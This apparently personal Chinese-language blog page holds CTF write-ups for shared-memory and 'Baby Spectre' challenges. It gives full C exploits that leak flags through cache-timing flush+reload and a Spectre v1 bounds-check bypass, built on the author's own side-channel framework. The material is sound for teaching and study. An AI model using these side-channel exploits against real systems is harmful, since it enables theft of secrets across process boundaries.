Examples#

下面给出一些我在学习过程中写的 demo，就不详细说明作用了，只贴一下代码（怕自己弄丢了

用到的 axium 是我自己写的内核 / 侧信道框架，点点 star 支持一下谢谢 :P

CuB3y0nd

axium

Waiting for api.github.com...

00K

Waiting...

对于侧信道，还提供了缓存噪声分析的 dashboard xD

每个 chart 都可以单独导出为 PNG，方便嵌入到文档中之类的……

当然，TUI 的可视化 report 也是必不可少的：

探测当前程序内内存映射有没有进缓存#

1
#include <axium/axium.h>
2

3
#define ARRAY_SIZE 32
4
#define PAGE_SIZE 0x1000
5
#define TOTAL_SIZE (ARRAY_SIZE * PAGE_SIZE)
6

7
int main(int argc, char *argv[]) {
8
  set_log_level(DEBUG);
9
  if (argc < 2) {
10
    log_info("Usage: %s <IDX>", argv[0]);
11
    return 1;
12
  }
13

14
  int target_idx = atoi(argv[1]);
15
  if (target_idx < 0 || target_idx >= ARRAY_SIZE) {
16
    log_error("Index must be between 0 and %d", ARRAY_SIZE - 1);
17
  }
18

19
  uint8_t *target = mmap(NULL, TOTAL_SIZE, PROT_READ | PROT_WRITE,
20
                         MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
21
  if (target == MAP_FAILED) {
22
    log_exception("mmap");
23
  }
24

25
  uint64_t threshold = cache_calibrate_threshold(target);
26
  log_info("Calibrated threshold (context-aware): %lu cycles", threshold);
27

28
  cache_flush_range(target, TOTAL_SIZE);
29

30
  maccess(&target[target_idx * PAGE_SIZE]);
31
  uint64_t results[ARRAY_SIZE];
32
  for (size_t i = 0; i < ARRAY_SIZE; i++) {
33
    size_t mixed_idx = MIXED_IDX(i, ARRAY_SIZE - 1);
34

35
    uint64_t start = probe_start();
36
    maccess(&target[mixed_idx * PAGE_SIZE]);
37
    uint64_t end = probe_end();
38

39
    results[mixed_idx] = end - start;
40
  }
41

42
  cache_report_t report;
43
  cache_analyze(&report, results, ARRAY_SIZE, threshold);
44
  cache_report(&report);
45

46
  if (cache_export_report(&report, "report.json") == 0) {
47
    cache_view_report("report.json");
48
  } else {
49
    log_error("Report export failed!");
50
  }
51

52
  munmap(target, TOTAL_SIZE);
53
  return 0;
54
}

探测其它程序内内存映射有没有进缓存#

先跑 multiprocess-attacker 再跑 victim 访问内存，效果如下：

1
#include <axium/axium.h>
2

3
#define ARRAY_SIZE 32
4
#define PAGE_SIZE 0x1000
5
#define TOTAL_SIZE (ARRAY_SIZE * PAGE_SIZE)
6

7
int main(int argc, char *argv[]) {
8
  set_log_level(DEBUG);
9
  if (argc < 3) {
10
    log_info("Usage: %s <IDX> <CPU CORE>", argv[0]);
11
    return -1;
12
  }
13

14
  int target_idx = atoi(argv[1]);
15
  if (target_idx < 0 || target_idx >= ARRAY_SIZE)
16
    log_error("Index must be between 0 and %d", ARRAY_SIZE - 1);
17

18
  long nprocs = sysconf(_SC_NPROCESSORS_ONLN);
19
  int chosen_cpu_core = atoi(argv[2]);
20
  if (chosen_cpu_core < 0 || chosen_cpu_core >= nprocs)
21
    log_error("CPU Core number must be between 0 and %ld", nprocs - 1);
22
  set_cpu_affinity(chosen_cpu_core);
23

24
  int fd = shm_open("/test", O_CREAT | O_RDWR, 0666);
25
  ftruncate(fd, TOTAL_SIZE);
26

27
  char *target =
28
      mmap(NULL, TOTAL_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
29

30
  log_info("Victim performing a single access to Index %d...", target_idx);
31
  maccess(&target[target_idx * PAGE_SIZE]);
32

33
  return 0;
34
}

1
#include <axium/axium.h>
2

3
#define ARRAY_SIZE 32
4
#define PAGE_SIZE 0x1000
5
#define TOTAL_SIZE (ARRAY_SIZE * PAGE_SIZE)
6

7
int main(int argc, char *argv[]) {
8
  set_log_level(DEBUG);
9
  if (argc < 2) {
10
    log_info("Usage: %s <CPU CORE>", argv[0]);
11
    return -1;
12
  }
13

14
  long nprocs = sysconf(_SC_NPROCESSORS_ONLN);
15
  int chosen_cpu_core = atoi(argv[1]);
16
  if (chosen_cpu_core < 0 || chosen_cpu_core >= nprocs)
17
    log_error("CPU Core number must be between 0 and %ld", nprocs - 1);
18
  set_cpu_affinity(chosen_cpu_core);
19

20
  shm_unlink("/test");
21
  int fd = shm_open("/test", O_CREAT | O_RDWR, 0666);
22
  ftruncate(fd, TOTAL_SIZE);
23

24
  char *target =
25
      mmap(NULL, TOTAL_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
26

27
  uint64_t threshold = cache_calibrate_threshold(target);
28
  log_info("Calibrated threshold (context-aware): %lu cycles", threshold);
29

30
  if (cache_audit(target, threshold) != 0)
31
    log_warning("Audit FAILED: clflush seems ineffective.");
32

33
  cache_watch_report_t report;
34
  uint64_t hits[ARRAY_SIZE] = {0};
35
  cache_watch_report_init(&report, hits, ARRAY_SIZE, threshold);
36

37
  cache_watch_config config =
38
      cache_watch_config_init(threshold, ARRAY_SIZE, PAGE_SIZE, 100);
39

40
  cache_watch_install_handler(&report, "report.json");
41
  cache_watch(target, &config, NULL, &report);
42

43
  return 0;
44
}

Shared Memory 1.0#

Information#

Category: Pwn

Description#

Get started with interacting with processes via shared memory.

Write-up#

前两道题不记分，估计是用来让我们熟悉一下共享内存的。

话不多说，直接逆。

main 先调用这个函数，把 flag 读到 bss 了，没啥说的。

1
int read_flag_to_global()
2
{
3
  int v1; // [rsp+8h] [rbp-8h]
4
  int fd; // [rsp+Ch] [rbp-4h]
5

6
  fd = open("/flag", 0);
7
  v1 = read(fd, &flag_val, 0x100u);
8
  if ( !fd || v1 <= 0 )
9
  {
10
    printf("Failed to read flag file.  Exiting");
11
    exit(1);
12
  }
13
  return close(fd);
14
}

然后是核心逻辑：

必须要 argc 大于 1，也就是除了 argv[0] 外我们起码还得多传一个参数，那具体要几个，以及，这个参数是干啥的呢？

我们注意到 argv[1] 被复制到了 dest，所以这个参数是必要的，没有溢出，设置了 NULL terminate，然后又创建了一个 argva 参数列表，列表里只有一个参数，即 dest。

1
  if ( argc > 1 )
2
  {
3
    strncpy(dest, argv[1], 0x12Bu);
4
    dest[299] = 0;
5
    argva[0] = dest;
6
    argva[1] = 0;
7
    shared_page = make_shared_page(&p_sem);
8
    v12 = (int)time(0) % 13;
9
    pin_cpu(v12);
10
    printf("Pinning processes to CPU %d\n", v12);
11
    v14 = fork();
12
    if ( v14 )
13
    {
14
      printf("Launching your code as PID: %d!\n", v14);
15
      puts("----------------");
16
      wait(0);
17
      v11 = inject_open_shm(v14);
18
      inject_mmap(v14, v11);
19
      inject_drop_privs(v14);
20
      sem = p_sem;
21
      sem_init(p_sem, 1, 0);
22
      v9 = sem + 1;
23
      *(_DWORD *)sem[1].__size = 0;
24
      fd = open("/flag", 0);
25
      buf = (char *)&p_sem[1].__align + 4;
26
      read(fd, (char *)&p_sem[1].__align + 4, 0x50u);
27
      printf("The flag is now in memory at %p\n", buf);
28
      ptrace_detatch(v14);
29
      shm_unlink("/pwncollege");
30
      puts("### Goodbye!");
31
    }
32
    else
33
    {
34
      ptrace(PTRACE_TRACEME, 0, 0, 0);
35
      execv(dest, argva);
36
    }
37
    return 0;
38
  }
39
  else
40
  {
41
    puts("ERROR: argc < 2!");
42
    return 1;
43
  }

接着创建共享页，并设置大小为 0x101000，然后映射到 0x1337000，权限是 PROT_READ | PROT_WRITE，flag 是 MAP_FIXED | MAP_SHARED，即必须映射到 addr 指定的地址且映射和 fd 背后的对象共享，即访问这个映射地址就是访问共享内存。

此外，0x1337000 这个地址也将用作全局变量 p_sem，根据定义，这是一个 semaphore。然后将共享内存的 fd 返回，给到 shared_page。

1
__int64 __fastcall make_shared_page(sem_t **p_sem)
2
{
3
  unsigned int fd; // [rsp+1Ch] [rbp-4h]
4

5
  puts("Creating Shared memory");
6
  shm_unlink("/pwncollege");
7
  fd = shm_open("/pwncollege", 66, 0x1C7u);
8
  ftruncate(fd, 0x101000);
9
  *p_sem = (sem_t *)mmap((void *)0x1337000, 0x101000u, 3, 32769, fd, 0);
10
  if ( *p_sem != (sem_t *)0x1337000 )
11
    __assert_fail("*addr == (char *) mmap_addr", "babyarchmemflag.c", 0x169u, "make_shared_page");
12
  return fd;
13
}

接着用当前的时间作为 seed 随机将程序绑定到 $[0, 13)$ 的一个 CPU Core 上运行。

1
int __fastcall pin_cpu(int n0x3FF)
2
{
3
  cpu_set_t cpuset; // [rsp+10h] [rbp-90h] BYREF
4
  unsigned __int64 n0x3FF_1; // [rsp+98h] [rbp-8h]
5

6
  memset(&cpuset, 0, sizeof(cpuset));
7
  n0x3FF_1 = n0x3FF;
8
  if ( (unsigned __int64)n0x3FF <= 1023 )
9
    cpuset.__bits[n0x3FF_1 >> 6] |= 1LL << (n0x3FF_1 & 63);
10
  return sched_setaffinity(0, 0x80u, &cpuset);
11
}

然后创建子进程，子进程会执行 dest，因此，我们知道 argv[1] 其实需要传递一个程序路径。此外，由于子进程设置了 PTRACE_TRACEME，所以父进程可以修改子进程的 stats 。

一旦 execv 执行成功，内核会自动 SIGTRAP，子进程暂停，父进程开始 ptrace 操作子进程。

1
      ptrace(PTRACE_TRACEME, 0, 0, 0);
2
      execv(dest, argva);

父进程通过 wait(0) 确保子进程发出 SIGTRAP 信号后，开始 ptrace，进行一些操作，具体内容自己分析太恶心了，丢给 AI 就好了，我就不写了。大致结果就是将 victim 打开的共享内存页注入到我们的 exp 程序中，省去了我们手动 mmap 绑定的步骤。

然后将 0x1337000，也就是 p_sem 信号量联合体初始化为 0，之后 open flag，将 flag 读到 (char *)&p_sem[1].__align + 4 的位置，这个可以看一下 sem_t 的定义：

1
#if __WORDSIZE == 64
2
# define __SIZEOF_SEM_T 32
3
#else
4
# define __SIZEOF_SEM_T 16
5
#endif
6

7
typedef union
8
{
9
  char __size[__SIZEOF_SEM_T];
10
  long int __align;
11
} sem_t;

因此它其实就是将 flag 读到了第二个联合体的地址加四的位置。之后 ptrace_detatch 让子进程继续跑。

所以我们只要写一个程序去输出 flag 被加载到的位置就好了。

Exploit#

1
#include <semaphore.h>
2
#include <unistd.h>
3

4
#define SHM_BASE 0x1337000
5
#define SEM_SIZE sizeof(sem_t)
6
#define OFFSET (SEM_SIZE + 4)
7
#define FLAG_ADDR (char *)(SHM_BASE + OFFSET)
8

9
int main(int argc, char *argv[]) {
10
  write(1, FLAG_ADDR, 0x100);
11
  return 0;
12
}

Shared Memory 2.0#

Information#

Category: Pwn

Description#

Get started with interacting with processes via shared memory.

Write-up#

和上题差不多，区别是父进程的实现：

1
    if ( v14 )
2
    {
3
      printf("Launching your code as PID: %d!\n", v14);
4
      puts("----------------");
5
      wait(0);
6
      v11 = inject_open_shm(v14);
7
      inject_mmap(v14, v11);
8
      inject_drop_privs(v14);
9
      sem = p_sem;
10
      sem_init(p_sem, 1, 0);
11
      v9 = sem + 1;
12
      *(_DWORD *)sem[1].__size = 0;
13
      printf("This challenge will read the flag into memory when the semaphore located at %p is incremented.", sem);
14
      ptrace_detatch(v14);
15
      sem_wait(sem);
16
      fd = open("/flag", 0);
17
      buf = (char *)&p_sem[1].__align + 4;
18
      read(fd, (char *)&p_sem[1].__align + 4, 0x50u);
19
      printf("The flag is now in memory at %p\n", buf);
20
      shm_unlink("/pwncollege");
21
      puts("### Goodbye!");
22
    }

ptrace_detatch 之后 sem_wait(sem) 等待信号量被消耗，然后才会去 open, read flag 。但是由于这个信号量被 sem_init(p_sem, 1, 0) 初始化为 0，所以我们的子进程应该使用 sem_post 增加一下信号量，否则程序会一直等待。

Exploit#

1
#include <semaphore.h>
2
#include <unistd.h>
3

4
#define SHM_BASE 0x1337000
5
#define SEM_SIZE sizeof(sem_t)
6
#define OFFSET (SEM_SIZE + 4)
7
#define FLAG_ADDR (char *)(SHM_BASE + OFFSET)
8
#define SEM_ADDR (sem_t *)SHM_BASE
9

10
int main(int argc, char *argv[]) {
11
  sem_post(SEM_ADDR);
12
  write(1, FLAG_ADDR, 0x100);
13
  return 0;
14
}

Baby Spectre 1#

Information#

Category: Pwn

Description#

Get started with a binary that side-channels itself!

Write-up#

正菜才刚刚开始。

简单逆向一下，我们可知 &sem[1] = p_sem = 0x1337000，会被初始化为 0，由于后续 sem_wait(*(sem_t **)&sem[1]) 的阻塞，故需要我们手动增加这个信号量，否则不会执行攻击；&sem[1] + 32LL 则是用于控制要访问的 flag byte 的 idx 。

然后这部分是非阻塞式地检查子进程有没有退出，退出则结束程序：

1
pid_1 = waitpid(pid, &stat_loc, 1);
2
if ( pid == pid_1 )
3
  break;

flush_cache 会将以 0x1337000 为基页的第二页，即 0x1338000 从 cache 中清空。

之后的 &p_sem[128 * flag_val[*idx] + 128]; 其实就是 *(0x1337000 + 0x1000 * flag_byte + 0x1000)，也就是摸了一下 0x1338000 + flag_byte * 0x1000 这一页，让这一页的前 64 字节进入 L1 Cache 。

TIP
至于为什么是 0x1000，其实是因为 C 是根据 sizeof(type) 进行索引换算的，即 sem_t *p_sem 在 C 语言的逻辑里：p_sem[N] 的实际地址为 p_sem + (N * sizeof(sem_t))，由于 sizeof(sem_t) == 0x20，所以这里的两个 128 其实应该换算为 0x1000。
这里看汇编的话其实更清楚，因为可以直接看到换算后的结果：
main+594  mov     rax, [rbp+idx]
main+59B  mov     eax, [rax]
main+59D  cdqe
main+59F  lea     rdx, flag_val
main+5A6  movzx   eax, byte ptr [rax+rdx]
main+5AA  mov     [rbp+var_A72], al
main+5B0  mov     rax, [rbp+p_sem]
main+5B7  movsx   edx, [rbp+var_A72]
main+5BE  shl     edx, 0Ch
main+5C1  movsxd  rdx, edx
main+5C4  add     rdx, 1000h
main+5CB  add     rax, rdx
main+5CE  mov     [rbp+var_A40], rax

接着 get_timing_data(idx, *(sem_t **)&sem[1], (__int64)timing_data); 内部会执行 256 次计时，统计 0x1338000 + [0, 255] * 0x1000 这 256 页的访问时间，写到 timing_data 数组。由于 *(_QWORD *)(8LL * (unsigned __int8)(-89 * i + 13) + timing_data)，我们可知 timing_data 是按照 _QWORD 访问的。

最后，下面的代码将 timing_data 的数据写到攻击者可访问的共享内存中，也就是 0x1338000 + __size[8 * i]，所以这也是将 0x1338000 视作一个按照 _QWORD 访问的数组，每个索引对应了 timing_data[i] 的计时信息。因此，只要这个计时信息小于 hit cache threshold，我们就认为对应的 page 包含一个 flag byte，而由于 flag byte 的存储是按照 *(0x1337000 + 0x1000 * flag_byte + 0x1000) 的形式访问的，所以我们只要将这个 page 的索引转换为对应的 ASCII 即可泄漏 flag 的值。

1
for ( i = 0; i <= 255; ++i )
2
{
3
  v14 = p_sem + 128;
4
  *(_QWORD *)&p_sem[128].__size[8 * i] = timing_data[i];
5
}

Exploit#

欣赏一下我的预言机版本半自动化 Pwn Framework xD

1
#include <axium/axium.h>
2

3
#define SHM_BASE ((char *)0x1337000)
4
#define SEM_OFFSET 0
5
#define IDX_ARRAY_OFFSET sizeof(sem_t)
6
#define TIMING_ARRAY_OFFSET 0x1000
7
#define TIMING_ARRAY_SIZE 256
8

9
/**
10
 * @brief Context for the challenge environment.
11
 */
12
typedef struct {
13
  sem_t *sem;             /**< Semaphore for synchronization. */
14
  int *idx_array;         /**< Index selection in shared memory. */
15
  uint64_t *timing_array; /**< Timing results in shared memory. */
16
} challenge_ctx_t;
17

18
/**
19
 * @brief Triggers the victim to perform a measurement.
20
 */
21
static void trigger(size_t idx_array, void *ctx) {
22
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;
23
  *c->idx_array = (int)idx_array;
24
  c->timing_array[TIMING_ARRAY_SIZE - 1] = 0; /* Clear synchronizing sentinel */
25
  sem_post(c->sem);
26
}
27

28
/**
29
 * @brief Waits for the victim to finish measurement.
30
 */
31
static bool wait(void *ctx) {
32
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;
33
  /* Wait up to 1 second, checking every 100us */
34
  return wait_until(c->timing_array[TIMING_ARRAY_SIZE - 1] != 0, 1.0, 100);
35
}
36

37
int main(void) {
38
  set_log_level(DEBUG);
39

40
  /* Match challenge's CPU affinity for stable measurements */
41
  set_cpu_affinity(time(NULL) % 13);
42

43
  /* clang-format off */
44
  challenge_ctx_t ctx = {
45
    .sem = (sem_t *)(SHM_BASE + SEM_OFFSET),
46
    .idx_array = (int *)(SHM_BASE + IDX_ARRAY_OFFSET),
47
    .timing_array = (uint64_t *)(SHM_BASE + TIMING_ARRAY_OFFSET)
48
  };
49

50
  schan_ops_t ops = {
51
    .trigger = trigger,
52
    .wait = wait,
53
    .analyze = NULL
54
  };
55
  /* clang-format on */
56

57
  schan_oracle_t schan_oracle;
58
  schan_oracle_init(&schan_oracle, ops, ctx.timing_array, TIMING_ARRAY_SIZE,
59
                    &ctx);
60

61
  /* Upcast to generic oracle for high-level scanning */
62
  oracle_t *oracle = &schan_oracle.base;
63

64
  log_info("Starting exploit...");
65

66
  char flag[256] = {0};
67
  ssize_t leaked = oracle_scan(oracle, flag, sizeof(flag) - 1, '}');
68

69
  if (leaked > 0) {
70
    log_success("Flag: %s", flag);
71
  } else {
72
    log_error("Exploit failed.");
73
  }
74

75
  return 0;
76
}

Baby Spectre 2#

Information#

Category: Pwn

Description#

A binary that side-channels itself, now using multiple pages.

Write-up#

这题就是给每个索引都开了一个 0x1000 大小的页，p_align = &p_sem[128 * i + 128].__align;，所以最好的办法应该是自己重构一个结果数组然后寻找最优匹配。

Exploit#

1
#include <axium/axium.h>
2

3
#define SHM_BASE ((char *)0x1337000)
4
#define SEM_OFFSET 0
5
#define IDX_ARRAY_OFFSET sizeof(sem_t)
6
#define TIMING_ARRAY_OFFSET 0x1000
7
#define TIMING_ARRAY_SIZE 256
8

9
typedef struct {
10
  sem_t *sem;
11
  int *idx_array;
12
  uint64_t *timing_array;
13
  uint64_t results[TIMING_ARRAY_SIZE];
14
} challenge_ctx_t;
15

16
static void trigger(size_t idx_array, void *ctx) {
17
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;
18
  *c->idx_array = (int)idx_array;
19
  uint64_t *sentinel =
20
      (uint64_t *)((char *)c->timing_array + 0x1000 * (TIMING_ARRAY_SIZE - 1));
21
  *sentinel = 0;
22
  sem_post(c->sem);
23
}
24

25
static bool wait(void *ctx) {
26
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;
27
  uint64_t *sentinel =
28
      (uint64_t *)((char *)c->timing_array + 0x1000 * (TIMING_ARRAY_SIZE - 1));
29

30
  if (!wait_until(*sentinel != 0, 1.0, 100)) {
31
    return false;
32
  }
33

34
  for (int i = 0; i < TIMING_ARRAY_SIZE; i++) {
35
    c->results[i] = *(uint64_t *)((char *)c->timing_array + 0x1000 * i);
36
  }
37

38
  return true;
39
}
40

41
int main(void) {
42
  set_log_level(DEBUG);
43
  set_cpu_affinity(time(NULL) % 13);
44

45
  /* clang-format off */
46
  challenge_ctx_t ctx = {
47
    .sem = (sem_t *)(SHM_BASE + SEM_OFFSET),
48
    .idx_array = (int *)(SHM_BASE + IDX_ARRAY_OFFSET),
49
    .timing_array = (uint64_t *)(SHM_BASE + TIMING_ARRAY_OFFSET)
50
  };
51

52
  schan_ops_t ops = {
53
    .trigger = trigger,
54
    .wait = wait,
55
    .analyze = NULL
56
  };
57
  /* clang-format on */
58

59
  schan_oracle_t schan_oracle;
60
  schan_oracle_init(&schan_oracle, ops, ctx.results, TIMING_ARRAY_SIZE, &ctx);
61

62
  oracle_t *oracle = &schan_oracle.base;
63

64
  log_info("Starting exploit...");
65

66
  char flag[256] = {0};
67
  ssize_t leaked = oracle_scan(oracle, flag, sizeof(flag) - 1, '}');
68

69
  if (leaked > 0) {
70
    log_success("Flag: %s", flag);
71
  } else {
72
    log_error("Exploit failed.");
73
  }
74

75
  return 0;
76
}

Baby Spectre 3#

Information#

Category: Pwn

Description#

Measure memory access timings to leak the flag via a side-channel.

Write-up#

到底是什么神人写个 exp 持续浪费 CPU 资源，还不结束的！他不会真以为自己一直跑就能赢吧……他不会挂着 exp 去睡觉了吧……我的 flag 啊～

Exploit#

1
#include <axium/axium.h>
2

3
#define SHM_BASE ((char *)0x1337000)
4
#define SEM_OFFSET 0
5
#define IDX_ARRAY_OFFSET sizeof(sem_t)
6
#define TIMING_ARRAY_SIZE 256
7

8
typedef struct {
9
  sem_t *sem;
10
  int *idx_array;
11
  char *probe_base;
12
  uint64_t results[TIMING_ARRAY_SIZE];
13
} challenge_ctx_t;
14

15
static void trigger(size_t idx_array, void *ctx) {
16
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;
17
  *c->idx_array = (int)idx_array;
18
  sem_post(c->sem);
19
}
20

21
static bool wait(void *ctx) {
22
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;
23

24
  for (int i = 0; i < TIMING_ARRAY_SIZE; i++) {
25
    int idx = MIXED_IDX(i, 255);
26
    char *addr = c->probe_base + 0x1000 * idx;
27

28
    uint64_t start = probe_start();
29
    maccess(addr);
30
    uint64_t end = probe_end();
31

32
    c->results[idx] = end - start;
33
  }
34

35
  return true;
36
}
37

38
int main(void) {
39
  set_log_level(DEBUG);
40
  set_cpu_affinity(time(NULL) % 13);
41

42
  /* clang-format off */
43
  challenge_ctx_t ctx = {
44
    .sem = (sem_t *)SHM_BASE,
45
    .idx_array = (int *)((sem_t *)SHM_BASE + 1),
46
    .probe_base = (char *)SHM_BASE + 0x1000
47
  };
48

49
  schan_ops_t ops = {
50
    .trigger = trigger,
51
    .wait = wait,
52
    .analyze = NULL
53
  };
54
  /* clang-format on */
55

56
  schan_oracle_t schan_oracle;
57
  schan_oracle_init(&schan_oracle, ops, ctx.results, TIMING_ARRAY_SIZE, &ctx);
58

59
  oracle_t *oracle = &schan_oracle.base;
60

61
  log_info("Starting exploit...");
62

63
  char flag[256] = {0};
64
  ssize_t leaked = oracle_scan(oracle, flag, sizeof(flag) - 1, '}');
65

66
  if (leaked > 0) {
67
    log_success("Flag: %s", flag);
68
  } else {
69
    log_error("Exploit failed.");
70
  }
71

72
  return 0;
73
}

Baby Spectre 4#

Information#

Category: Pwn

Description#

Perform a full flush and reload side-channel attack!

Write-up#

不是哥们，我这题都秒了，上题却因为有傻逼持续浪费 CPU 而导致我拿不到 flag，让我拿到一堆噪声我也是无语了。

Exploit#

1
#include <axium/axium.h>
2

3
#define SHM_BASE ((char *)0x1337000)
4
#define SEM_OFFSET 0
5
#define IDX_ARRAY_OFFSET sizeof(sem_t)
6
#define TIMING_ARRAY_SIZE 256
7

8
typedef struct {
9
  sem_t *sem;
10
  int *idx_array;
11
  char *probe_base;
12
  uint64_t results[TIMING_ARRAY_SIZE];
13
} challenge_ctx_t;
14

15
static void trigger(size_t idx_array, void *ctx) {
16
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;
17

18
  for (int i = 0; i < TIMING_ARRAY_SIZE; i++) {
19
    clflush(c->probe_base + 0x1000 * i);
20
  }
21
  mfence();
22

23
  *c->idx_array = (int)idx_array;
24
  sem_post(c->sem);
25
}
26

27
static bool wait(void *ctx) {
28
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;
29

30
  for (int i = 0; i < TIMING_ARRAY_SIZE; i++) {
31
    int idx = MIXED_IDX(i, 255);
32
    char *addr = c->probe_base + 0x1000 * idx;
33

34
    uint64_t start = probe_start();
35
    maccess(addr);
36
    uint64_t end = probe_end();
37

38
    c->results[idx] = end - start;
39
  }
40

41
  return true;
42
}
43

44
int main(void) {
45
  set_log_level(DEBUG);
46
  set_cpu_affinity(time(NULL) % 13);
47

48
  /* clang-format off */
49
  challenge_ctx_t ctx = {
50
    .sem = (sem_t *)SHM_BASE,
51
    .idx_array = (int *)((sem_t *)SHM_BASE + 1),
52
    .probe_base = (char *)SHM_BASE + 0x1000
53
  };
54

55
  schan_ops_t ops = {
56
    .trigger = trigger,
57
    .wait = wait,
58
    .analyze = NULL
59
  };
60
  /* clang-format on */
61

62
  schan_oracle_t schan_oracle;
63
  schan_oracle_init(&schan_oracle, ops, ctx.results, TIMING_ARRAY_SIZE, &ctx);
64

65
  oracle_t *oracle = &schan_oracle.base;
66

67
  log_info("Starting exploit...");
68

69
  char flag[256] = {0};
70
  ssize_t leaked = oracle_scan(oracle, flag, sizeof(flag) - 1, '}');
71

72
  if (leaked > 0) {
73
    log_success("Flag: %s", flag);
74
  } else {
75
    log_error("Exploit failed.");
76
  }
77

78
  return 0;
79
}

Baby Spectre 5#

Information#

Category: Pwn

Description#

This binary never reads the flag bytes.. or does it?

Write-up#

这题对于摸 flag 有条件，即 (float)((float)*p_align / 257.0) > 1.0，也就是传入的索引起码为 258 才可以进入这个 if 分支，但是如果是 258 的话，又摸不到 flag……

1
if ( (float)((float)*p_align / 257.0) > 1.0 )
2
  v12 = &p_sem[128 * flag_val[*p_align] + 128];

所以这题其实是打 Spectre v1 Bounds Check Bypass (BCB) CVE-2017-5753，通过多次传入 258 以训练（欺骗）CPU 的 Branch Prediction Unit (BCB)，让它认为程序极有可能进入这个 if 分支，导致推测性的执行 if 分支内的代码（前提是要有足够的时间去 Speculative Execution，所以这里才使用浮点数计算。因为通常浮点数计算消耗的 cycles 都很大，这为推测执行提供了充足的执行窗口。）

So ? 我写了一个自动化的 Spectre v1 BCB 漏洞利用框架，能应对强噪声环境，还提供了各种统计分析工具……自己研究去吧～

~~感觉我的 wp 写的越来越简略了，不过我觉得，都学到这一步了的人，应该不难理解吧？所以啰里巴嗦的概念我就不写了（~~

Exploit#

1
#include <axium/axium.h>
2

3
#define SHM_BASE ((char *)0x1337000)
4
#define PAGE_SIZE 0x1000
5
#define TIMING_ARRAY_SIZE 256
6

7
typedef struct {
8
  sem_t *sem;
9
  int *idx_addr;
10
  char *probe_base;
11
  uint64_t results[TIMING_ARRAY_SIZE];
12
} challenge_ctx_t;
13

14
static uint64_t cache_threshold = -1;
15
static int training_byte_to_ignore = -1;
16

17
static void victim_callback(void *ctx) {
18
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;
19
  sem_post(c->sem);
20
}
21

22
static void trigger_wrapper(size_t idx, void *ctx) {
23
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;
24

25
  /* clang-format off */
26
  spectre_config_t config = {
27
    .variant = SPECTRE_V1_BCB,
28
    .v1 = {
29
      .index_addr = c->idx_addr,
30
      .index_size = sizeof(int),
31
      .training_val = 258,
32
      .attack_val = idx,
33
    },
34
    .ratio = 4,
35
    .trials = 100,
36
    .sync_delay = 0,
37
    .post_delay = 100
38
  };
39
  /* clang-format on */
40

41
  cache_flush_range(c->probe_base, PAGE_SIZE * TIMING_ARRAY_SIZE);
42
  mfence();
43
  spectre_v1(&config, victim_callback, c);
44
}
45

46
static bool wait_wrapper(void *ctx) {
47
  challenge_ctx_t *c = (challenge_ctx_t *)ctx;
48
  for (int i = 0; i < 256; i++) {
49
    int idx = MIXED_IDX(i, 255);
50
    char *addr = c->probe_base + PAGE_SIZE * idx;
51

52
    uint64_t start = probe_start();
53
    maccess(addr);
54
    uint64_t end = probe_end();
55

56
    c->results[idx] = end - start;
57
  }
58
  return true;
59
}
60

61
static int analyze_wrapper(const uint64_t *data, size_t len, void *ctx) {
62
  (void)ctx;
63
  uint64_t min_time = cache_threshold;
64
  int best_index = -1;
65
  for (int i = 0; i < (int)len; i++) {
66
    if (i == training_byte_to_ignore)
67
      continue;
68
    if (data[i] > 0 && data[i] < min_time) {
69
      min_time = data[i];
70
      best_index = i;
71
    }
72
  }
73
  return best_index;
74
}
75

76
int main(void) {
77
  set_log_level(DEBUG);
78
  set_cpu_affinity(time(NULL) % 13);
79

80
  /* clang-format off */
81
  challenge_ctx_t ctx = {
82
    .sem = (sem_t *)SHM_BASE,
83
    .idx_addr = (int *)((sem_t *)SHM_BASE + 1),
84
    .probe_base = (char *)SHM_BASE + PAGE_SIZE
85
  };
86

87
  schan_ops_t ops = {
88
    .trigger = trigger_wrapper,
89
    .wait = wait_wrapper,
90
    .analyze = analyze_wrapper
91
  };
92
  /* clang-format on */
93

94
  cache_threshold = cache_calibrate_threshold(ctx.probe_base);
95

96
  log_info("Profiling bias...");
97
  trigger_wrapper(258, &ctx);
98
  wait_wrapper(&ctx);
99
  training_byte_to_ignore = find_best_hit(ctx.results, 256);
100

101
  schan_oracle_t oracle;
102
  schan_oracle_init(&oracle, ops, ctx.results, 256, &ctx);
103

104
  char flag[256] = {0};
105
  log_info("Starting statistical scan...");
106

107
  ssize_t leaked = oracle_scan_stat(&oracle.base, flag, sizeof(flag) - 1, '}',
108
                                    50, 2, 10, NULL, 256);
109
  if (leaked > 0) {
110
    log_success("Flag: %s", flag);
111
  } else {
112
    log_error("Exploit failed.");
113
  }
114

115
  return 0;
116
}

Baby Spectre 6#

Information#

Category: Pwn

Description#

Locate the flag in memory using shellcode after all references to it have been DESTROYED, you will only have access to the “exit” system call. You will need a creative way of locating the flag’s address in your process!